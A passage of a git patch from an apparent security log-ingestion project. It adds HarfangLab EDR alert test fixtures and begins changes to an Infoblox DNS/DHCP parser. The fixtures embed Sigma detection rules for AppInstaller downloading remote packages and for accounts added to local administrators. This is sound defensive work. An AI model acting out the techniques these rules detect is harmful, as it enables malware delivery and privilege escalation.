-p\",\"parent_image\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"parent_unique_id\":\"aaaaaaaa-1111-bbbb-2222-cccccccccccc\",\"pid\":20188,\"ppid\":1332,\"process_name\":\"AppInstaller.exe\",\"process_unique_id\":\"11111111-aaaa-2222-bbbb-333333333333\",\"size\":2860064,\"username\":\"DOMAINSI\\\\JDOE\",\"grandparent_image\":\"C:\\\\Windows\\\\System32\\\\services.exe\",\"grandparent_commandline\":\"C:\\\\WINDOWS\\\\system32\\\\services.exe\",\"grandparent_unique_id\":\"66666666-7777-8888-9999-000000000000\",\"stacktrace\":\"\",\"stacktrace_minimal\":\"\",\"ancestors\":\"C:\\\\Windows\\\\System32\\\\svchost.exe|C:\\\\Windows\\\\System32\\\\services.exe|C:\\\\Windows\\\\System32\\\\wininit.exe\",\"usersid\":\"S-1-2-3-4-5\",\"integrity_level\":\"Low\",\"session\":1,\"logonid\":1686269,\"parent_integrity_level\":\"System\",\"grandparent_integrity_level\":\"System\",\"fake_ppid\":0,\"fake_parent_image\":\"\",\"fake_parent_commandline\":\"\",\"pe_info\":{\"company_name\":\"Microsoft Corporation\",\"file_description\":\"AppInstaller.exe\",\"file_version\":\"1.24.25180.00000\",\"internal_name\":\"AppInstaller\",\"legal_copyright\":\"\u00a9Microsoft Corporation. All rights reserved.\",\"original_filename\":\"AppInstaller.exe\",\"pe_timestamp\":\"2024-10-25T23:14:08.000Z\",\"product_name\":\"Microsoft Desktop App Installer\",\"product_version\":\"1.24.25180.0\"},\"signed\":true,\"signature_info\":{\"signer_info\":{\"serial_number\":\"1234567890\",\"thumbprint\":\"8f985be8fd256085c90a95d3c74580511a1db975\",\"thumbprint_sha256\":\"e4ab39116a7dc57d073164eb1c840b1fb8334a8c920b92efafea19112dce643b\",\"issuer_name\":\"Microsoft Code Signing PCA 2011\",\"display_name\":\"Microsoft Corporation\"},\"root_info\":{\"serial_number\":\"abcdef12\",\"thumbprint\":\"8f43288ad272f3103b6fb1428485ea3014c0bcfe\",\"thumbprint_sha256\":\"847df6a78497943f27fc72eb93f9a637320a02b561d0a91b09e87a7807ed7c61\",\"issuer_name\":\"Microsoft Root Certificate Authority 2011\",\"display_name\":\"Microsoft Root Certificate Authority 2011\"},\"signed_authenticode\":true,\"signed_catalog\":false},\"pe_timestamp_int\":1729898048,\"pe_timestamp\":\"2024-10-25T23:14:08.000Z\",\"pe_imphash\":\"714FD4ADFC932C947A3949463867BE18\",\"dont_create_process\":true,\"status\":0,\"detection_timestamp\":\"2024-11-18T09:18:31.558Z\",\"system_event_type\":\"url_request_event\",\"ioc_matches\":[],\"log_platform_flag\":0,\"sigma_rule_content\":\"title: \\\"Package Installed via AppInstaller from the Internet\\\"\\nid: aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\\ndescription: |\\n Detects URL requests performed by AppInstaller in order to install a remote application.\\n Adversaries have been seen abusing the AppInstaller URI scheme (ms-appinstaller) to trick users into installing malicious software directly from Internet.\\n Microsoft has disabled installation of remote package by default in late December 2023 but it can still be enabled via a group policy configuration.\\n It is recommended to check if the accessed URL correspond to a known and legitimate application and if suspicious commands have been launched during the installation process.\\nreferences:\\n - https://www.microsoft.com/en-us/security/blog/2023/12/28/financially-motivated-threat-actors-misusing-app-installer/\\n - https://learn.microsoft.com/en-us/windows/msix/app-installer/installing-windows10-apps-web\\n - https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/\\n - https://attack.mitre.org/techniques/T1189/\\nstatus: stable\\ndate: 2023/12/28\\nmodified: 2024/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.initial_access\\n - attack.t1189.001\\nlogsource:\\n product: windows\\n category: url_request\\ndetection:\\n selection:\\n ProcessOriginalFileName: AppInstaller.exe\\n ProcessCommandLine|contains: -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca\\n\\n exclusion_knownurl:\\n RequestUrlHost:\\n - download.mytobiidynavox.com # Snap.Windows.WinUI.OEM_1.30.0.3621.msixbundle\\n - windbg.download.prss.microsoft.com # windbg.appinstaller\\n - languagetool.org # Languagetool.Packaging_0.5.3.5_x64.msixbundle\\n - staticcdn.duckduckgo.com # DuckDuckGo_0.61.5.0.msixbundle\\n condition: selection and not 1 of exclusion_*\\nlevel: medium\"},\"detection_origin\":\"agent\",\"image_name\":\"C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\AppInstaller.exe\",\"rule_content\":\"title: \\\"Package Installed via AppInstaller from the Internet\\\"\\nid: aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\\ndescription: |\\n Detects URL requests performed by AppInstaller in order to install a remote application.\\n Adversaries have been seen abusing the AppInstaller URI scheme (ms-appinstaller) to trick users into installing malicious software directly from Internet.\\n Microsoft has disabled installation of remote package by default in late December 2023 but it can still be enabled via a group policy configuration.\\n It is recommended to check if the accessed URL correspond to a known and legitimate application and if suspicious commands have been launched during the installation process.\\nreferences:\\n - https://www.microsoft.com/en-us/security/blog/2023/12/28/financially-motivated-threat-actors-misusing-app-installer/\\n - https://learn.microsoft.com/en-us/windows/msix/app-installer/installing-windows10-apps-web\\n - https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/\\n - https://attack.mitre.org/techniques/T1189/\\nstatus: stable\\ndate: 2023/12/28\\nmodified: 2024/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.initial_access\\n - attack.t1189.001\\nlogsource:\\n product: windows\\n category: url_request\\ndetection:\\n selection:\\n ProcessOriginalFileName: AppInstaller.exe\\n ProcessCommandLine|contains: -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca\\n\\n exclusion_knownurl:\\n RequestUrlHost:\\n - download.mytobiidynavox.com # Snap.Windows.WinUI.OEM_1.30.0.3621.msixbundle\\n - windbg.download.prss.microsoft.com # windbg.appinstaller\\n - languagetool.org # Languagetool.Packaging_0.5.3.5_x64.msixbundle\\n - staticcdn.duckduckgo.com # DuckDuckGo_0.61.5.0.msixbundle\\n condition: selection and not 1 of exclusion_*\\nlevel: medium\",\"aggregation_key\":\"1609170aa71e23cf15ca43adc927697e071c4a4207f8d4fc9d74f7382b4e9b9c\",\"threat_type\":\"commandline\",\"threat_values\":[\":\\\\program files\\\\windowsapps\\\\microsoft.desktopappinstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\appinstaller.exe -servername:app.appx9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca\"],\"threat_key\":1343,\"groups\":[{\"id\":\"12345678-abcd-ef90-1234-123456abcdef\",\"name\":\"DOMAIN_Postes_de_travail_Windows\"}]}", + "event": { + "category": [ + "process" + ], + "dataset": "alert", + "kind": "alert", + "type": [ + "start" + ] + }, + "@timestamp": "2024-11-18T09:18:31.558000Z", + "agent": { + "id": "11111111-aaaa-bbbb-cccc-222222222222", + "name": "harfanglab" + }, + "file": { + "hash": { + "md5": "b4e821b2dac20d8d2ac6889f9c3fc315", + "sha1": "a53b060cfb5e23508b4f9658d904cd7cb659de7f", + "sha256": "3cc3cbf238e81e92242f4c5f422d85636d1771f2ebc781c2c8de5394f0741b45" + } + }, + "harfanglab": { + "aggregation_key": "1609170aa71e23cf15ca43adc927697e071c4a4207f8d4fc9d74f7382b4e9b9c", + "alert_subtype": "process", + "alert_time": "2024-11-18T09:18:31.852+00:00", + "alert_unique_id": "11111111-2222-3333-4444-555555555555", + "execution": 0, + "groups": [ + "{\"id\": \"12345678-abcd-ef90-1234-123456abcdef\", \"name\": \"DOMAIN_Postes_de_travail_Windows\"}" + ], + "level": "medium", + "status": "new" + }, + "host": { + "domain": "DOMAINSI", + "hostname": "HOST01", + "name": "HOST01", + "os": { + "full": "Windows 10 Pro", + "version": "10.0.19045" + } + }, + "log": { + "hostname": "HOST01" + }, + "process": { + "command_line": "C:\\Program Files\\WindowsApps\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\AppInstaller.exe -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca", + "executable": "C:\\Program Files\\WindowsApps\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\AppInstaller.exe", + "name": "AppInstaller.exe", + "parent": { + "command_line": "C:\\WINDOWS\\system32\\svchost.exe -k DcomLaunch -p", + "executable": "C:\\Windows\\System32\\svchost.exe" + }, + "pe": { + "company": "Microsoft Corporation", + "description": "AppInstaller.exe", + "file_version": "1.24.25180.00000", + "imphash": "714FD4ADFC932C947A3949463867BE18", + "original_file_name": "AppInstaller.exe", + "product": "Microsoft Desktop App Installer" + }, + "pid": 20188, + "working_directory": "C:\\Program Files\\WindowsApps\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\" + }, + "related": { + "hash": [ + "3cc3cbf238e81e92242f4c5f422d85636d1771f2ebc781c2c8de5394f0741b45", + "a53b060cfb5e23508b4f9658d904cd7cb659de7f", + "b4e821b2dac20d8d2ac6889f9c3fc315" + ], + "hosts": [ + "HOST01" + ], + "user": [ + "DOMAINSI\\JDOE" + ] + }, + "rule": { + "category": "sigma", + "description": "Detects URL requests performed by AppInstaller in order to install a remote application.\nAdversaries have been seen abusing the AppInstaller URI scheme (ms-appinstaller) to trick users into installing malicious software directly from Internet.\nMicrosoft has disabled installation of remote package by default in late December 2023 but it can still be enabled via a group policy configuration.\nIt is recommended to check if the accessed URL correspond to a known and legitimate application and if suspicious commands have been launched during the installation process.\n", + "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee", + "name": "Package Installed via AppInstaller from the Internet" + }, + "url": { + "domain": "url.integration.com", + "original": "https://url.integration.com/test", + "path": "/test", + "port": 443, + "registered_domain": "integration.com", + "scheme": "https", + "subdomain": "url", + "top_level_domain": "com" + }, + "user": { + "name": "DOMAINSI\\JDOE", + "roles": "DOMAIN_Postes_de_travail_Windows" + } + } +} \ No newline at end of file diff --git a/HarfangLab/harfanglab/tests/alert_5.json b/HarfangLab/harfanglab/tests/alert_5.json new file mode 100644 index 000000000..0f68a7c8c --- /dev/null +++ b/HarfangLab/harfanglab/tests/alert_5.json @@ -0,0 +1,88 @@ +{ + "input": { + "message": "{\"type\": \"rtlogs\", \"level\": \"medium\", \"maturity\": \"stable\", \"quarantine\": 4, \"rule_content\": \"title: User Account Added to the Local Administrators Group\\nid: 12345678-abcd-ef90-1234-123456abcdef\\ndescription: \\\"Detects when a user account is added into the local Administrators group.\\\\n\\nThis action can be the result of a malicious activity.\\\"\\nreferences:\\n - https://attack.mitre.org/techniques/T1098/\\n - https://attack.mitre.org/techniques/T1078/003/\\nstatus: stable\\ndate: 2021/04/28\\nmodified: 2021/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.persistence\\n - attack.t1098\\n - attack.privilege_escalation\\n - attack.t1078.003\\nlogsource:\\n product: windows\\n service: security\\ndetection:\\n selection:\\n EventID: 4732\\n GroupSid: S-1-2-3-4\\n exclusion:\\n - MemberSid: S-1-2-4-*-512 # avoid detection when a computer joined a domain (domain admins sid)\\n - SubjectUserName|endswith: \\n condition: selection and not exclusion\\nfalsepositives:\\n - Legitimate administrator action\\nlevel: medium\", \"alert_time\": \"2024-11-12T08:39:14.017+00:00\", \"rule_name\": \"User Account Added to the Local Administrators Group\", \"tags\": [\"attack.persistence\", \"attack.privilege_escalation\", \"attack.t1078.003\", \"attack.t1098\"], \"level_int\": 30, \"eventlog\": {\"level\": \"log_always\", \"type\": \"wineventlog\", \"detection_timestamp\": \"2024/11/12 08:39:13.967\", \"event_id\": 4732, \"event_data\": {\"SubjectUserSid\": \"S-1-2-4-5-6\", \"SubjectDomainName\": \"NT_DOMAIN\", \"PrivilegeList\": \"-\", \"TargetDomainName\": \"Builtin\", \"TargetUserName\": \"Administrateurs\", \"MemberSid\": \"S-1-2-4-7-8\", \"MemberName\": \"NT_DOMAIN\\\\DOEJ\", \"SubjectUserName\": \"sw-suser\", \"TargetSid\": \"S-1-2-3-4\", \"SubjectLogonId\": \"0x1234567\"}, \"record_number\": 174136362, \"event_date\": \"2024-11-12T08:39:13.205Z\", \"sigma_rule_content\": \"title: User Account Added to the Local Administrators Group\\nid: 12345678-abcd-ef90-1234-123456abcdef\\ndescription: \\\"Detects when a user account is added into the local Administrators group.\\\\n\\nThis action can be the result of a malicious activity.\\\"\\nreferences:\\n - https://attack.mitre.org/techniques/T1098/\\n - https://attack.mitre.org/techniques/T1078/003/\\nstatus: stable\\ndate: 2021/04/28\\nmodified: 2021/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.persistence\\n - attack.t1098\\n - attack.privilege_escalation\\n - attack.t1078.003\\nlogsource:\\n product: windows\\n service: security\\ndetection:\\n selection:\\n EventID: 4732\\n GroupSid: S-1-2-3-4\\n exclusion:\\n - MemberSid: S-1-2-4-*-512 # avoid detection when a computer joined a domain (domain admins sid)\\n - SubjectUserName|endswith: \\n condition: selection and not exclusion\\nfalsepositives:\\n - Legitimate administrator action\\nlevel: medium\", \"source_name\": \"Microsoft-Windows-Security-Auditing\", \"dont_create_eventlog\": true, \"user\": {\"domain\": \"\", \"name\": \"\", \"type\": \"unknown\", \"identifier\": \"\"}, \"thread_id\": 1728, \"log_name\": \"Security\", \"process_id\": 1224, \"status\": 0, \"ioc_matches\": [], \"provider_guid\": \"54849625-5478-4994-a5ba-3e3b0328c30d\", \"keywords\": [\"AuditSuccess\", \"ReservedKeyword63\"], \"log_type\": \"eventlog\", \"computer_name\": \"PC01.domain.com\", \"user_data\": {}, \"system_event_type\": \"event_log_event\"}, \"threat_values\": [], \"destination\": \"syslog\", \"@timestamp\": \"2024-11-12T08:39:14.017Z\", \"detection_date\": \"2024-11-12T08:39:13.967+00:00\", \"@event_create_date\": \"2024-11-12T08:39:14.017Z\", \"aggregation_key\": \"8415b902c507b98714301b4ab6633009fbf2728c0cfaf61637c5e903627e4ebb\", \"alert_type\": \"sigma\", \"rule_id\": \"12345678-abcd-ef90-1234-123456abcdef\", \"ingestion_date\": \"2024-11-12T08:39:14.017+00:00\", \"tenant\": \"3b37ffc8520ef542\", \"threat_type\": \"new\", \"groups\": [{\"name\": \"Postes de travail\", \"id\": \"11111111-2222-3333-4444-555555555555\"}, {\"name\": \"Postes de travail : Lot 3\", \"id\": \"66666666-7777-8888-9999-000000000000\"}], \"status\": \"new\", \"execution\": 0, \"agent\": {\"agentid\": \"11111111-aaaa-2222-bbbb-333333333333\", \"domain\": null, \"osproducttype\": \"Windows 10 Enterprise\", \"ostype\": \"windows\", \"dnsdomainname\": \"domain.com\", \"distroid\": null, \"domainname\": \"NT_DOMAIN\", \"osversion\": \"10.0.19045\", \"hostname\": \"PC01\", \"version\": \"4.1.6\", \"additional_info\": {}}, \"threat_key\": \"20528\", \"mitre_cells\": [\"persistence__t1078.003\", \"persistence__t1098\", \"privilege-escalation__t1078.003\", \"privilege-escalation__t1098\"], \"alert_unique_id\": \"aaaaaaaa-1111-bbbb-2222-cccccccccccc\", \"log_type\": \"alert\", \"@version\": \"1\", \"msg\": \"Detects when a user account is added into the local Administrators group.\\n This action can be the result of a malicious activity.\", \"alert_subtype\": \"eventlog\", \"detection_origin\": \"agent\"}", + "sekoiaio": { + "intake": { + "dialect": "HarfangLab EDR", + "dialect_uuid": "3c7057d3-4689-4fae-8033-6f1f887a70f2" + } + } + }, + "expected": { + "message": "{\"type\": \"rtlogs\", \"level\": \"medium\", \"maturity\": \"stable\", \"quarantine\": 4, \"rule_content\": \"title: User Account Added to the Local Administrators Group\\nid: 12345678-abcd-ef90-1234-123456abcdef\\ndescription: \\\"Detects when a user account is added into the local Administrators group.\\\\n\\nThis action can be the result of a malicious activity.\\\"\\nreferences:\\n - https://attack.mitre.org/techniques/T1098/\\n - https://attack.mitre.org/techniques/T1078/003/\\nstatus: stable\\ndate: 2021/04/28\\nmodified: 2021/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.persistence\\n - attack.t1098\\n - attack.privilege_escalation\\n - attack.t1078.003\\nlogsource:\\n product: windows\\n service: security\\ndetection:\\n selection:\\n EventID: 4732\\n GroupSid: S-1-2-3-4\\n exclusion:\\n - MemberSid: S-1-2-4-*-512 # avoid detection when a computer joined a domain (domain admins sid)\\n - SubjectUserName|endswith: \\n condition: selection and not exclusion\\nfalsepositives:\\n - Legitimate administrator action\\nlevel: medium\", \"alert_time\": \"2024-11-12T08:39:14.017+00:00\", \"rule_name\": \"User Account Added to the Local Administrators Group\", \"tags\": [\"attack.persistence\", \"attack.privilege_escalation\", \"attack.t1078.003\", \"attack.t1098\"], \"level_int\": 30, \"eventlog\": {\"level\": \"log_always\", \"type\": \"wineventlog\", \"detection_timestamp\": \"2024/11/12 08:39:13.967\", \"event_id\": 4732, \"event_data\": {\"SubjectUserSid\": \"S-1-2-4-5-6\", \"SubjectDomainName\": \"NT_DOMAIN\", \"PrivilegeList\": \"-\", \"TargetDomainName\": \"Builtin\", \"TargetUserName\": \"Administrateurs\", \"MemberSid\": \"S-1-2-4-7-8\", \"MemberName\": \"NT_DOMAIN\\\\DOEJ\", \"SubjectUserName\": \"sw-suser\", \"TargetSid\": \"S-1-2-3-4\", \"SubjectLogonId\": \"0x1234567\"}, \"record_number\": 174136362, \"event_date\": \"2024-11-12T08:39:13.205Z\", \"sigma_rule_content\": \"title: User Account Added to the Local Administrators Group\\nid: 12345678-abcd-ef90-1234-123456abcdef\\ndescription: \\\"Detects when a user account is added into the local Administrators group.\\\\n\\nThis action can be the result of a malicious activity.\\\"\\nreferences:\\n - https://attack.mitre.org/techniques/T1098/\\n - https://attack.mitre.org/techniques/T1078/003/\\nstatus: stable\\ndate: 2021/04/28\\nmodified: 2021/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.persistence\\n - attack.t1098\\n - attack.privilege_escalation\\n - attack.t1078.003\\nlogsource:\\n product: windows\\n service: security\\ndetection:\\n selection:\\n EventID: 4732\\n GroupSid: S-1-2-3-4\\n exclusion:\\n - MemberSid: S-1-2-4-*-512 # avoid detection when a computer joined a domain (domain admins sid)\\n - SubjectUserName|endswith: \\n condition: selection and not exclusion\\nfalsepositives:\\n - Legitimate administrator action\\nlevel: medium\", \"source_name\": \"Microsoft-Windows-Security-Auditing\", \"dont_create_eventlog\": true, \"user\": {\"domain\": \"\", \"name\": \"\", \"type\": \"unknown\", \"identifier\": \"\"}, \"thread_id\": 1728, \"log_name\": \"Security\", \"process_id\": 1224, \"status\": 0, \"ioc_matches\": [], \"provider_guid\": \"54849625-5478-4994-a5ba-3e3b0328c30d\", \"keywords\": [\"AuditSuccess\", \"ReservedKeyword63\"], \"log_type\": \"eventlog\", \"computer_name\": \"PC01.domain.com\", \"user_data\": {}, \"system_event_type\": \"event_log_event\"}, \"threat_values\": [], \"destination\": \"syslog\", \"@timestamp\": \"2024-11-12T08:39:14.017Z\", \"detection_date\": \"2024-11-12T08:39:13.967+00:00\", \"@event_create_date\": \"2024-11-12T08:39:14.017Z\", \"aggregation_key\": \"8415b902c507b98714301b4ab6633009fbf2728c0cfaf61637c5e903627e4ebb\", \"alert_type\": \"sigma\", \"rule_id\": \"12345678-abcd-ef90-1234-123456abcdef\", \"ingestion_date\": \"2024-11-12T08:39:14.017+00:00\", \"tenant\": \"3b37ffc8520ef542\", \"threat_type\": \"new\", \"groups\": [{\"name\": \"Postes de travail\", \"id\": \"11111111-2222-3333-4444-555555555555\"}, {\"name\": \"Postes de travail : Lot 3\", \"id\": \"66666666-7777-8888-9999-000000000000\"}], \"status\": \"new\", \"execution\": 0, \"agent\": {\"agentid\": \"11111111-aaaa-2222-bbbb-333333333333\", \"domain\": null, \"osproducttype\": \"Windows 10 Enterprise\", \"ostype\": \"windows\", \"dnsdomainname\": \"domain.com\", \"distroid\": null, \"domainname\": \"NT_DOMAIN\", \"osversion\": \"10.0.19045\", \"hostname\": \"PC01\", \"version\": \"4.1.6\", \"additional_info\": {}}, \"threat_key\": \"20528\", \"mitre_cells\": [\"persistence__t1078.003\", \"persistence__t1098\", \"privilege-escalation__t1078.003\", \"privilege-escalation__t1098\"], \"alert_unique_id\": \"aaaaaaaa-1111-bbbb-2222-cccccccccccc\", \"log_type\": \"alert\", \"@version\": \"1\", \"msg\": \"Detects when a user account is added into the local Administrators group.\\n This action can be the result of a malicious activity.\", \"alert_subtype\": \"eventlog\", \"detection_origin\": \"agent\"}", + "event": { + "dataset": "alert", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-12T08:39:14.017000Z", + "action": { + "properties": { + "MemberName": "DOEJ", + "SubjectDomainName": "NT_DOMAIN", + "SubjectLogonId": "0x1234567", + "SubjectUserName": "sw-suser", + "SubjectUserSid": "S-1-2-4-5-6", + "TargetDomainName": "Builtin", + "TargetSid": "S-1-2-3-4", + "TargetUserName": "Administrateurs" + } + }, + "agent": { + "id": "11111111-aaaa-2222-bbbb-333333333333", + "name": "harfanglab" + }, + "harfanglab": { + "aggregation_key": "8415b902c507b98714301b4ab6633009fbf2728c0cfaf61637c5e903627e4ebb", + "alert_subtype": "eventlog", + "alert_time": "2024-11-12T08:39:14.017+00:00", + "alert_unique_id": "aaaaaaaa-1111-bbbb-2222-cccccccccccc", + "execution": 0, + "groups": [ + "{\"id\": \"11111111-2222-3333-4444-555555555555\", \"name\": \"Postes de travail\"}", + "{\"id\": \"66666666-7777-8888-9999-000000000000\", \"name\": \"Postes de travail : Lot 3\"}" + ], + "level": "medium", + "status": "new" + }, + "host": { + "domain": "NT_DOMAIN", + "hostname": "PC01", + "name": "PC01", + "os": { + "full": "Windows 10 Enterprise", + "version": "10.0.19045" + } + }, + "log": { + "hostname": "PC01" + }, + "organization": { + "id": "3b37ffc8520ef542" + }, + "related": { + "hosts": [ + "PC01" + ], + "user": [ + "sw-suser" + ] + }, + "rule": { + "category": "sigma", + "description": "Detects when a user account is added into the local Administrators group.\n This action can be the result of a malicious activity.", + "id": "12345678-abcd-ef90-1234-123456abcdef", + "name": "User Account Added to the Local Administrators Group" + }, + "user": { + "domain": "NT_DOMAIN", + "name": "sw-suser", + "roles": "Postesdetravail,Postesdetravail:Lot3", + "target": { + "domain": "Builtin", + "name": "Administrateurs" + } + } + } +} \ No newline at end of file From 78a93392d672511ff0b2fcfe0c421bb0eeb43414 Mon Sep 17 00:00:00 2001 From: vg-svitla Date: Fri, 29 Nov 2024 12:44:41 +0200 Subject: [PATCH 106/150] Fix: Infoblox DDI format improvement --- Infoblox/ddi/_meta/fields.yml | 35 +++++++ Infoblox/ddi/ingest/parser.yml | 120 +++++++++++++++++++++-- Infoblox/ddi/tests/query_log_dhcp_1.json | 32 ++++++ Infoblox/ddi/tests/query_log_dhcp_2.json | 32 ++++++ Infoblox/ddi/tests/query_log_dhcp_3.json | 31 ++++++ Infoblox/ddi/tests/query_log_dhcp_4.json | 38 +++++++ Infoblox/ddi/tests/query_log_dhcp_5.json | 33 +++++++ Infoblox/ddi/tests/query_log_dhcp_6.json | 32 ++++++ Infoblox/ddi/tests/query_log_dhcp_7.json | 32 ++++++ Infoblox/ddi/tests/query_log_dhcp_8.json | 27 +++++ Infoblox/ddi/tests/query_log_dns_1.json | 36 +++++++ Infoblox/ddi/tests/query_log_dns_2.json | 33 +++++++ Infoblox/ddi/tests/query_log_dns_3.json | 33 +++++++ Infoblox/ddi/tests/query_log_dns_4.json | 34 +++++++ Infoblox/ddi/tests/query_log_dns_5.json | 34 +++++++ Infoblox/ddi/tests/query_log_dns_6.json | 34 +++++++ Infoblox/ddi/tests/query_log_dns_7.json | 33 +++++++ Infoblox/ddi/tests/query_log_dns_8.json | 33 +++++++ Infoblox/ddi/tests/query_log_dns_9.json | 35 +++++++ 19 files changed, 710 insertions(+), 7 deletions(-) create mode 100644 Infoblox/ddi/tests/query_log_dhcp_1.json create mode 100644 Infoblox/ddi/tests/query_log_dhcp_2.json create mode 100644 Infoblox/ddi/tests/query_log_dhcp_3.json create mode 100644 Infoblox/ddi/tests/query_log_dhcp_4.json create mode 100644 Infoblox/ddi/tests/query_log_dhcp_5.json create mode 100644 Infoblox/ddi/tests/query_log_dhcp_6.json create mode 100644 Infoblox/ddi/tests/query_log_dhcp_7.json create mode 100644 Infoblox/ddi/tests/query_log_dhcp_8.json create mode 100644 Infoblox/ddi/tests/query_log_dns_1.json create mode 100644 Infoblox/ddi/tests/query_log_dns_2.json create mode 100644 Infoblox/ddi/tests/query_log_dns_3.json create mode 100644 Infoblox/ddi/tests/query_log_dns_4.json create mode 100644 Infoblox/ddi/tests/query_log_dns_5.json create mode 100644 Infoblox/ddi/tests/query_log_dns_6.json create mode 100644 Infoblox/ddi/tests/query_log_dns_7.json create mode 100644 Infoblox/ddi/tests/query_log_dns_8.json create mode 100644 Infoblox/ddi/tests/query_log_dns_9.json diff --git a/Infoblox/ddi/_meta/fields.yml b/Infoblox/ddi/_meta/fields.yml index 064d69713..69f6818da 100644 --- a/Infoblox/ddi/_meta/fields.yml +++ b/Infoblox/ddi/_meta/fields.yml @@ -2,3 +2,38 @@ infoblox.ddi.category: description: The logging category of this event. name: infoblox.ddi.category type: keyword + +infoblox.dhcp.circuit_id: + description: The circuit ID. + name: infoblox.dhcp.circuit_id + type: keyword + +infoblox.dhcp.interface_ip: + description: The IP address of the interface. + name: infoblox.dhcp.interface_ip + type: ip + +infoblox.dhcp.lease_message: + description: The lease message. + name: infoblox.dhcp.lease_message + type: keyword + +infoblox.dhcp.lease_time: + description: The lease time. + name: infoblox.dhcp.lease_time + type: keyword + +infoblox.dhcp.request_message: + description: The request message. + name: infoblox.dhcp.request_message + type: keyword + +infoblox.dhcp.router_ip: + description: The IP address of the router. + name: infoblox.dhcp.router_ip + type: ip + +infoblox.dhcp.trans_id: + description: The transaction ID. + name: infoblox.dhcp.trans_id + type: keyword diff --git a/Infoblox/ddi/ingest/parser.yml b/Infoblox/ddi/ingest/parser.yml index 25264fc22..2fb950af6 100644 --- a/Infoblox/ddi/ingest/parser.yml +++ b/Infoblox/ddi/ingest/parser.yml @@ -5,7 +5,7 @@ pipeline: name: grok.match properties: output_field: message - pattern: "%{CLIENT}" + pattern: "%{DNS_FORMERR}|%{DNS_OTHER}|%{DNS_0}|%{DNS_1}|%{DNS_2}|%{DNS_3}|%{DNS_4}|%{DNS_5}|%{DNS_6}|%{DNS_7}|%{DNS_8}|%{DNS_9}|%{DNS_10}|%{DNS_11}|%{DNS_12}|%{DNS_13}" custom_patterns: QUERY_FLAGS: "%{QUERY_FLAGS_RD:flags_rd}%{QUERY_FLAGS_EDNS:flags_edns}?%{QUERY_FLAGS_TCP:flags_tcp}?%{QUERY_FLAGS_DNSSEC:flags_dnssec}?%{QUERY_FLAGS_CD:flags_cd}?%{QUERY_FLAGS_DNS_SERVER_COOKIE}?%{QUERY_FLAGS_DNS_SERVER_COOKIE_WITHOUT_VALID_SERVER}?" QUERY_FLAGS_RD: '[\+\-]' @@ -16,22 +16,128 @@ pipeline: QUERY_FLAGS_CD: "C" QUERY_FLAGS_DNS_SERVER_COOKIE: "V" QUERY_FLAGS_DNS_SERVER_COOKIE_WITHOUT_VALID_SERVER: "K" - CLIENT: '(%{WORD:category}: )?client ?(%{DATA}) %{IP:src}#%{INT:spt} (%{DATA}): query: %{IPORHOST:dns_question_name} %{WORD:dns_question_class} %{WORD:dns_question_type} %{QUERY_FLAGS} \(%{IP}\)' + CLIENT: "client (?:%{DATA} )?%{IP:client_ip}#%{NUMBER:client_port}:?" + VIEW: "view %{DATA:infoblox_nios_log_view}: " + + # Next patterns are inspired by + # https://github.com/elastic/integrations/blob/main/packages/infoblox_nios/data_stream/log/elasticsearch/ingest_pipeline/pipeline_dns.yml + DNS_1: "zone %{DATA:dns_question_name}/%{DATA:dns_question_class}: notify from %{IP:client_ip}#%{NUMBER:client_port}:? %{GREEDYDATA:infoblox_nios_log_dns_message}" + DNS_2: "transfer of '%{DATA:dns_question_name}/%{DATA:dns_question_class}' from %{IP:client_ip}#%{NUMBER:client_port}:? %{GREEDYDATA:infoblox_nios_log_dns_message}" + DNS_3: "validating %{DATA:dns_question_name}/%{WORD:dns_question_type}: %{GREEDYDATA:infoblox_nios_log_dns_message}" + DNS_4: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*%{CLIENT} updating zone '%{DATA:dns_question_name}/%{DATA:dns_question_class}': %{GREEDYDATA:infoblox_nios_log_dns_message}" + DNS_5: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*%{CLIENT} \\(%{DATA}\\): %{VIEW}?query failed %{GREEDYDATA:infoblox_nios_log_dns_message}" + DNS_6: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*%{CLIENT} \\(%{DATA:infoblox_nios_log_dns_before_query}\\): rewriting query name %{DATA} to '%{DATA:infoblox_nios_log_dns_after_query}', type %{DATA:dns_question_type}" + DNS_7: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*%{CLIENT} \\(%{DATA}\\): %{VIEW}?query: %{DATA:dns_question_name} %{DATA:dns_question_class} %{WORD:dns_question_type} %{DATA:infoblox_nios_log_dns_header_flags} \\(%{IP:server_ip}\\)" + DNS_8: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*%{CLIENT} %{DATA:network_transport}: %{VIEW}?query: %{DATA:dns_question_name} %{DATA:dns_question_class} %{WORD:dns_question_type} response: %{DATA:dns_response_code} %{DATA:infoblox_nios_log_dns_header_flags}" + DNS_9: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*%{CLIENT} \\(%{DATA}\\): transfer of '%{DATA:dns_question_name}/%{DATA:dns_question_class}': %{GREEDYDATA:infoblox_nios_log_dns_message}" + DNS_10: 